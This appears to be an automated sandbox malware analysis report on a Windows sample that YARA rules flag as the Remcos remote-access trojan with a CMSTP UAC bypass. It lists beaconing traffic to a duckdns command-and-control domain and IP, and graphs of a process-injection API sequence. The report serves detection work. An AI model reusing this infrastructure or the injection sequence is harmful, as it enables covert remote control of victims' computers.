              Jun 6, 2023 17:24:58.068386078 CEST4975130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:58.573993921 CEST3086149751192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:59.603640079 CEST4975230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:00.276000023 CEST3086149752192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:00.276130915 CEST4975230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:00.282345057 CEST4975230861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:00.591722012 CEST3086149752192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:01.623442888 CEST4975330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:01.911439896 CEST3086149753192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:01.911748886 CEST4975330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:01.921581984 CEST4975330861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:02.269655943 CEST3086149753192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:03.315639019 CEST4975430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:03.550843954 CEST3086149754192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:03.551131964 CEST4975430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:03.565720081 CEST4975430861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:03.885087967 CEST3086149754192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:04.908169031 CEST4975530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:05.232669115 CEST3086149755192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:05.233071089 CEST4975530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:05.239201069 CEST4975530861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:05.562417030 CEST3086149755192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:06.609831095 CEST4975630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:06.801959991 CEST3086149756192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:06.802129984 CEST4975630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:06.817325115 CEST4975630861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:07.240406036 CEST3086149756192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:08.268162966 CEST4975730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:08.738677025 CEST3086149757192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:08.742011070 CEST4975730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:08.750278950 CEST4975730861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:09.242665052 CEST3086149757192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:10.275815010 CEST4975830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:10.765023947 CEST3086149758192.169.69.26192.168.2.4
              Jun 6, 2023 17:25:10.765155077 CEST4975830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:10.770080090 CEST4975830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:25:11.072143078 CEST3086149758192.169.69.26192.168.2.4
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Jun 6, 2023 17:24:55.990896940 CEST8.8.8.8192.168.2.40xed15No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:57.783139944 CEST8.8.8.8192.168.2.40x81b3No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:24:59.601772070 CEST8.8.8.8192.168.2.40xfba9No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:01.621582031 CEST8.8.8.8192.168.2.40x85f4No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:03.311701059 CEST8.8.8.8192.168.2.40x7a4dNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:04.906692028 CEST8.8.8.8192.168.2.40xe585No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:06.607954979 CEST8.8.8.8192.168.2.40x8514No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:08.266287088 CEST8.8.8.8192.168.2.40x57d7No error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
              Jun 6, 2023 17:25:10.273897886 CEST8.8.8.8192.168.2.40xb90fNo error (0)pekonomia.duckdns.org192.169.69.26A (IP address)IN (0x0001)false


              Target ID:1
              Start time:17:23:04
              Start date:06/06/2023
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):false
              Commandline:C:\Users\user\Desktop\file.exe
              Imagebase:0x18ff8920000
              File size:500224 bytes
              MD5 hash:66108176E22E6F9513A62C76F2185468
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:2
              Start time:17:23:06
              Start date:06/06/2023
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              Imagebase:0xec0000
              File size:55400 bytes
              MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              Reputation:high


                Execution Graph

                Execution Coverage:12.1%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:38
                Total number of Limit Nodes:0

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 119 7ff814e7b19d-7ff814e7b1a9 120 7ff814e7b1ab-7ff814e7b1b3 119->120 121 7ff814e7b1b4-7ff814e7b261 119->121 120->121 124 7ff814e7b289-7ff814e7b322 WriteProcessMemory 121->124 125 7ff814e7b263-7ff814e7b286 121->125 126 7ff814e7b32a-7ff814e7b386 124->126 127 7ff814e7b324 124->127 125->124 127->126
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 129 7ff814e7ac45-7ff814e7ac51 130 7ff814e7ac5c-7ff814e7ad14 129->130 131 7ff814e7ac53-7ff814e7ac5b 129->131 134 7ff814e7ad36-7ff814e7ad9f Wow64SetThreadContext 130->134 135 7ff814e7ad16-7ff814e7ad33 130->135 131->130 136 7ff814e7ada7-7ff814e7adf1 134->136 137 7ff814e7ada1 134->137 135->134 137->136
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 139 7ff814e78cc8-7ff814e7b147 VirtualAllocEx 145 7ff814e7b14f-7ff814e7b19b 139->145 146 7ff814e7b149 139->146 146->145
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 148 7ff814e7affd-7ff814e7b009 149 7ff814e7b00b-7ff814e7b013 148->149 150 7ff814e7b014-7ff814e7b059 148->150 149->150 152 7ff814e7b060-7ff814e7b147 VirtualAllocEx 150->152 153 7ff814e7b14f-7ff814e7b19b 152->153 154 7ff814e7b149 152->154 154->153
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 156 7ff814e78cd8-7ff814e7b059 159 7ff814e7b060-7ff814e7b147 VirtualAllocEx 156->159 160 7ff814e7b14f-7ff814e7b19b 159->160 161 7ff814e7b149 159->161 161->160
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 163 7ff814e7ae55-7ff814e7af9d ReadProcessMemory 166 7ff814e7af9f 163->166 167 7ff814e7afa5-7ff814e7affb 163->167 166->167
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 169 7ff814e78c88-7ff814e7ad14 175 7ff814e7ad36-7ff814e7ad9f Wow64SetThreadContext 169->175 176 7ff814e7ad16-7ff814e7ad33 169->176 177 7ff814e7ada7-7ff814e7adf1 175->177 178 7ff814e7ada1 175->178 176->175 178->177
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 180 7ff814e78c98-7ff814e7ad14 184 7ff814e7ad36-7ff814e7ad9f Wow64SetThreadContext 180->184 185 7ff814e7ad16-7ff814e7ad33 180->185 186 7ff814e7ada7-7ff814e7adf1 184->186 187 7ff814e7ada1 184->187 185->184 187->186
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 189 7ff814e7b48d-7ff814e7b55a ResumeThread 192 7ff814e7b55c 189->192 193 7ff814e7b562-7ff814e7b5a0 189->193 192->193
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.555686214.00007FF814E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814E70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_7ff814e70000_file.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:3.3%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:5.1%
                Total number of Nodes:1178
                Total number of Limit Nodes:60
46901 401fb8 11 API calls 46900->46901 46902 41a0e0 46901->46902 46903 401fb8 11 API calls 46902->46903 46904 41a0e9 46903->46904 46905 401fb8 11 API calls 46904->46905 46906 41a0f2 46905->46906 46907 401fb8 11 API calls 46906->46907 46907->46886 47376 401f66 46908->47376 46910 4094b1 _wcslen 46911 4094c4 46910->46911 46912 4094db 46910->46912 46913 40cf38 31 API calls 46911->46913 46914 40cf38 31 API calls 46912->46914 46915 4094cc 46913->46915 46916 4094e3 46914->46916 46917 401ef3 28 API calls 46915->46917 46918 401ef3 28 API calls 46916->46918 46942 4094d6 46917->46942 46919 4094f1 46918->46919 46920 401ee9 11 API calls 46919->46920 46921 4094f9 46920->46921 47380 4087f0 28 API calls 46921->47380 46922 401ee9 11 API calls 46924 409530 46922->46924 46926 409576 46924->46926 46927 409557 46924->46927 46925 40950b 47381 402ff4 46925->47381 47388 4086d0 28 API calls 46926->47388 46930 409574 46927->46930 47386 4086d0 28 API calls 46927->47386 46933 401ee9 11 API calls 46930->46933 46932 409584 47389 40977e 85 API calls 46932->47389 46938 409596 46933->46938 46935 40956a 47387 409835 28 API calls 46935->47387 46936 401ef3 28 API calls 46940 409520 46936->46940 46938->46585 46941 401ee9 11 API calls 46940->46941 46941->46942 46942->46922 46944 41a18b GetUserNameW 46943->46944 47435 40415e 46944->47435 46949 402ff4 28 API calls 46950 41a1cd 46949->46950 46951 401ee9 11 API calls 46950->46951 46952 41a1d6 46951->46952 46953 401ee9 11 API calls 46952->46953 46954 40e740 46953->46954 46955 401ef3 46954->46955 46956 401f02 46955->46956 46963 401f4a 46955->46963 46957 402232 11 API calls 46956->46957 46958 401f0b 46957->46958 46959 401f4d 46958->46959 46961 401f26 46958->46961 46960 402316 11 API calls 46959->46960 46960->46963 47530 40303c 28 API calls 46961->47530 46964 401ee9 46963->46964 46965 402232 11 API calls 46964->46965 46966 401ef2 46965->46966 46966->46627 46966->46628 46968 412808 RegQueryValueExA RegCloseKey 46967->46968 46969 40e801 46967->46969 46968->46969 
46969->46496 46969->46646 46971 41a7cd 46970->46971 47531 40ae7e 46971->47531 46973 41a7d5 46973->46481 46975 40e8af 46974->46975 46976 412d27 RegDeleteValueW 46974->46976 46975->46491 46976->46975 46978 40d25f 46977->46978 46979 4127e7 3 API calls 46978->46979 46980 40d266 46979->46980 46981 40d285 46980->46981 47545 4016e7 46980->47545 46985 414271 46981->46985 46983 40d273 47548 412b5f RegCreateKeyA 46983->47548 46986 4020bf 11 API calls 46985->46986 46987 414285 46986->46987 47562 41a40e 46987->47562 46990 4020bf 11 API calls 46991 41429b 46990->46991 46992 401e45 22 API calls 46991->46992 46993 4142a9 46992->46993 46994 43a3ac _strftime 39 API calls 46993->46994 46995 4142b6 46994->46995 46996 4142c8 46995->46996 46997 4142bb Sleep 46995->46997 46998 402073 28 API calls 46996->46998 46997->46996 46999 4142d7 46998->46999 47000 401e45 22 API calls 46999->47000 47001 4142e0 47000->47001 47002 4020d6 28 API calls 47001->47002 47003 4142eb 47002->47003 47004 41a976 28 API calls 47003->47004 47005 4142f3 47004->47005 47566 40487e WSAStartup 47005->47566 47007 4142fd 47008 401e45 22 API calls 47007->47008 47009 414306 47008->47009 47010 401e45 22 API calls 47009->47010 47034 414385 47009->47034 47011 41431f 47010->47011 47014 401e45 22 API calls 47011->47014 47012 401e45 22 API calls 47012->47034 47013 4020d6 28 API calls 47013->47034 47015 414330 47014->47015 47017 401e45 22 API calls 47015->47017 47016 41a976 28 API calls 47016->47034 47018 414341 47017->47018 47019 401e45 22 API calls 47018->47019 47021 414352 47019->47021 47020 406292 28 API calls 47020->47034 47023 401e45 22 API calls 47021->47023 47022 401fc2 28 API calls 47022->47034 47024 414363 47023->47024 47025 401e45 22 API calls 47024->47025 47026 414375 47025->47026 47668 40471d 88 API calls 47026->47668 47029 4144d3 WSAGetLastError 47669 41b45a 30 API calls 47029->47669 47034->47012 47034->47013 47034->47016 47034->47020 47034->47022 47034->47029 47036 41a04a 79 API calls 47034->47036 47038 4052fe 28 
API calls 47034->47038 47039 401e6d 11 API calls 47034->47039 47040 43a3ac _strftime 39 API calls 47034->47040 47041 408832 28 API calls 47034->47041 47043 402ef0 28 API calls 47034->47043 47044 402073 28 API calls 47034->47044 47045 401fb8 11 API calls 47034->47045 47050 41288e 31 API calls 47034->47050 47060 414702 47034->47060 47567 414230 47034->47567 47572 40480d 47034->47572 47579 404f31 47034->47579 47594 4048a8 connect 47034->47594 47654 404e06 WaitForSingleObject 47034->47654 47670 4052dd 28 API calls 47034->47670 47671 413904 50 API calls 47034->47671 47672 4086d0 28 API calls 47034->47672 47673 440751 20 API calls 47034->47673 47674 4129e0 RegOpenKeyExA RegQueryValueExA RegCloseKey 47034->47674 47036->47034 47038->47034 47039->47034 47042 414e01 Sleep 47040->47042 47041->47034 47042->47034 47043->47034 47044->47034 47045->47034 47050->47034 47051 40415e 28 API calls 47051->47060 47054 401e45 22 API calls 47055 414780 GetTickCount 47054->47055 47677 41a6e9 28 API calls 47055->47677 47058 41a6e9 28 API calls 47058->47060 47060->47034 47060->47051 47060->47054 47060->47058 47062 41a879 28 API calls 47060->47062 47064 402e81 28 API calls 47060->47064 47065 408832 28 API calls 47060->47065 47067 402ef0 28 API calls 47060->47067 47069 401fb8 11 API calls 47060->47069 47070 401ee9 11 API calls 47060->47070 47073 402073 28 API calls 47060->47073 47074 41a04a 79 API calls 47060->47074 47675 40d28d 6 API calls 47060->47675 47676 41a79d 28 API calls 47060->47676 47678 41a641 GetTickCount 47060->47678 47679 41a5f1 30 API calls ___scrt_get_show_window_mode 47060->47679 47680 40ee14 29 API calls 47060->47680 47681 402f11 28 API calls 47060->47681 47682 408853 28 API calls 47060->47682 47683 404a81 60 API calls ctype 47060->47683 47684 404bf0 111 API calls new 47060->47684 47685 40a5c4 84 API calls 47060->47685 47062->47060 47064->47060 47065->47060 47067->47060 47069->47060 47070->47060 47073->47060 47074->47060 47075->46408 47076->46415 47077->46419 47080 4020bf 11 
API calls 47079->47080 47081 40629e 47080->47081 47082 403280 28 API calls 47081->47082 47083 4062bb 47082->47083 47083->46441 47085 40e0a8 47084->47085 47086 41285b RegQueryValueExA RegCloseKey 47084->47086 47085->46438 47085->46460 47086->47085 47087->46444 47088->46480 47089->46471 47090->46461 47091->46479 47093 401f66 11 API calls 47092->47093 47094 40cf54 47093->47094 47095 40cf74 47094->47095 47096 40cfa9 47094->47096 47097 40cf6a 47094->47097 47706 41a10f 29 API calls 47095->47706 47098 41ab12 GetCurrentProcess 47096->47098 47100 40d09d GetLongPathNameW 47097->47100 47102 40cfae 47098->47102 47101 40415e 28 API calls 47100->47101 47104 40d0b2 47101->47104 47105 40cfb2 47102->47105 47106 40d004 47102->47106 47103 40cf7d 47107 401ef3 28 API calls 47103->47107 47108 40415e 28 API calls 47104->47108 47110 40415e 28 API calls 47105->47110 47109 40415e 28 API calls 47106->47109 47111 40cf87 47107->47111 47112 40d0c1 47108->47112 47113 40d012 47109->47113 47114 40cfc0 47110->47114 47116 401ee9 11 API calls 47111->47116 47709 40d2d5 28 API calls 47112->47709 47119 40415e 28 API calls 47113->47119 47120 40415e 28 API calls 47114->47120 47116->47097 47117 40d0d4 47710 402f85 28 API calls 47117->47710 47122 40d028 47119->47122 47123 40cfd6 47120->47123 47121 40d0df 47711 402f85 28 API calls 47121->47711 47708 402f85 28 API calls 47122->47708 47707 402f85 28 API calls 47123->47707 47127 40d0e9 47130 401ee9 11 API calls 47127->47130 47128 40d033 47131 401ef3 28 API calls 47128->47131 47129 40cfe1 47132 401ef3 28 API calls 47129->47132 47133 40d0f3 47130->47133 47134 40d03e 47131->47134 47135 40cfec 47132->47135 47136 401ee9 11 API calls 47133->47136 47137 401ee9 11 API calls 47134->47137 47138 401ee9 11 API calls 47135->47138 47140 40d0fc 47136->47140 47141 40d047 47137->47141 47139 40cff5 47138->47139 47143 401ee9 11 API calls 47139->47143 47144 401ee9 11 API calls 47140->47144 47142 401ee9 11 API calls 47141->47142 47142->47111 47143->47111 47145 40d105 47144->47145 
47146 401ee9 11 API calls 47145->47146 47147 40d10e 47146->47147 47148 401ee9 11 API calls 47147->47148 47149 40d117 47148->47149 47149->46531 47150->46544 47151->46565 47152->46524 47153->46559 47157 432dfa 47154->47157 47155 43a620 new 21 API calls 47155->47157 47156 40e5ee 47156->46593 47157->47155 47157->47156 47712 441850 7 API calls 2 library calls 47157->47712 47713 433530 RaiseException __CxxThrowException@8 new 47157->47713 47714 433513 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47157->47714 47161->46623 47162->46610 47164->46655 47165->46466 47168 41a020 LoadResource LockResource SizeofResource 47167->47168 47169 40e8fb 47167->47169 47168->47169 47170 43a620 47169->47170 47175 444a38 ___crtLCMapStringA 47170->47175 47171 444a76 47187 43eead 20 API calls _free 47171->47187 47173 444a61 RtlAllocateHeap 47174 444a74 47173->47174 47173->47175 47174->46754 47175->47171 47175->47173 47186 441850 7 API calls 2 library calls 47175->47186 47178 40209f 47177->47178 47188 4023ae 47178->47188 47180 4020aa 47192 4024ea 47180->47192 47182 4020b9 47182->46757 47184 402097 28 API calls 47183->47184 47185 406460 47184->47185 47185->46764 47186->47175 47187->47174 47189 402408 47188->47189 47190 4023b8 47188->47190 47189->47180 47190->47189 47199 402787 11 API calls std::_Deallocate 47190->47199 47193 4024fa 47192->47193 47194 402500 47193->47194 47195 402515 47193->47195 47200 402549 47194->47200 47210 4028c8 47195->47210 47198 402513 47198->47182 47199->47189 47221 402868 47200->47221 47202 40255d 47203 402572 47202->47203 47204 402587 47202->47204 47226 402a14 22 API calls 47203->47226 47206 4028c8 28 API calls 47204->47206 47209 402585 47206->47209 47207 40257b 47227 4029ba 22 API calls 47207->47227 47209->47198 47211 4028d1 47210->47211 47212 402933 47211->47212 47213 4028db 47211->47213 47235 402884 22 API calls std::_Xinvalid_argument 47212->47235 47216 4028e4 47213->47216 47217 4028f7 47213->47217 47229 402c8e 47216->47229 47219 4028f5 
47217->47219 47220 4023ae 11 API calls 47217->47220 47219->47198 47220->47219 47222 402870 47221->47222 47223 402878 47222->47223 47228 402c83 22 API calls 47222->47228 47223->47202 47226->47207 47227->47209 47230 402c98 __EH_prolog 47229->47230 47236 402e34 22 API calls 47230->47236 47232 402d04 47233 4023ae 11 API calls 47232->47233 47234 402d72 47233->47234 47234->47219 47236->47232 47238 4020c7 47237->47238 47239 4023ae 11 API calls 47238->47239 47240 4020d2 47239->47240 47240->46773 47241->46773 47243 41b74c 47242->47243 47244 41b7ab 47243->47244 47249 41b75c 47243->47249 47245 41b7c5 47244->47245 47246 41b8eb 28 API calls 47244->47246 47263 41ba51 28 API calls 47245->47263 47246->47245 47248 41b794 47262 41ba51 28 API calls 47248->47262 47249->47248 47254 41b8eb 47249->47254 47250 41b7a7 47250->46773 47253->46781 47256 41b8f3 47254->47256 47255 41b925 47255->47248 47256->47255 47257 41b929 47256->47257 47260 41b90d 47256->47260 47274 402705 22 API calls std::_Xinvalid_argument 47257->47274 47264 41b95c 47260->47264 47262->47250 47263->47250 47265 41b966 __EH_prolog 47264->47265 47275 4026f7 22 API calls 47265->47275 47267 41b979 47276 41ba68 11 API calls 47267->47276 47269 41b99f 47270 41b9d7 47269->47270 47277 402710 11 API calls 47269->47277 47270->47255 47272 41b9be 47278 4026f2 11 API calls std::_Deallocate 47272->47278 47275->47267 47276->47269 47277->47272 47278->47270 47279->46796 47280->46801 47281->46799 47284 40328a 47283->47284 47285 4028c8 28 API calls 47284->47285 47286 4032a9 47284->47286 47285->47286 47286->46812 47288 4051db 47287->47288 47297 405254 47288->47297 47290 4051e8 47290->46815 47292 402041 47291->47292 47293 4023ae 11 API calls 47292->47293 47294 40205b 47293->47294 47319 40265a 47294->47319 47298 405262 47297->47298 47299 405268 47298->47299 47300 40527e 47298->47300 47308 4025d0 47299->47308 47301 4052d5 47300->47301 47302 405296 47300->47302 47317 402884 22 API calls std::_Xinvalid_argument 47301->47317 47306 4028c8 28 API calls 
47302->47306 47307 40527c 47302->47307 47306->47307 47307->47290 47309 402868 22 API calls 47308->47309 47310 4025e2 47309->47310 47311 402652 47310->47311 47313 402609 47310->47313 47318 402884 22 API calls std::_Xinvalid_argument 47311->47318 47315 4028c8 28 API calls 47313->47315 47316 40261b 47313->47316 47315->47316 47316->47307 47320 40266b 47319->47320 47321 4023ae 11 API calls 47320->47321 47322 40206d 47321->47322 47322->46818 47323->46820 47324->46831 47327 419e2c 47326->47327 47328 41ab1f GetCurrentProcess 47326->47328 47329 41288e RegOpenKeyExA 47327->47329 47328->47327 47330 4128bc RegQueryValueExA RegCloseKey 47329->47330 47331 4128e6 47329->47331 47330->47331 47332 402073 28 API calls 47331->47332 47333 4128fb 47332->47333 47333->46842 47334->46850 47336 4024d9 47335->47336 47337 4024ea 28 API calls 47336->47337 47338 402091 47337->47338 47338->46537 47355 43a30a 47339->47355 47341 439750 47361 4390b7 35 API calls 3 library calls 47341->47361 47343 439715 47343->47341 47344 43972a 47343->47344 47346 43972f _strftime 47343->47346 47360 43eead 20 API calls _free 47344->47360 47346->46883 47348 43975c 47350 43978b 47348->47350 47362 43a34f 39 API calls __Toupper 47348->47362 47349 4397f7 47364 43a2b6 20 API calls 2 library calls 47349->47364 47350->47349 47363 43a2b6 20 API calls 2 library calls 47350->47363 47353 4398be _strftime 47353->47346 47365 43eead 20 API calls _free 47353->47365 47356 43a322 47355->47356 47357 43a30f 47355->47357 47356->47343 47366 43eead 20 API calls _free 47357->47366 47359 43a314 _strftime 47359->47343 47360->47346 47361->47348 47362->47348 47363->47349 47364->47353 47365->47346 47366->47359 47373 401f90 47367->47373 47369 402efe 47370 402035 11 API calls 47369->47370 47371 402f0d 47370->47371 47371->46897 47372->46900 47374 4025d0 28 API calls 47373->47374 47375 401f9d 47374->47375 47375->47369 47377 401f6e 47376->47377 47390 402232 47377->47390 47379 401f79 47379->46910 47380->46925 47395 403202 47381->47395 47383 403002 
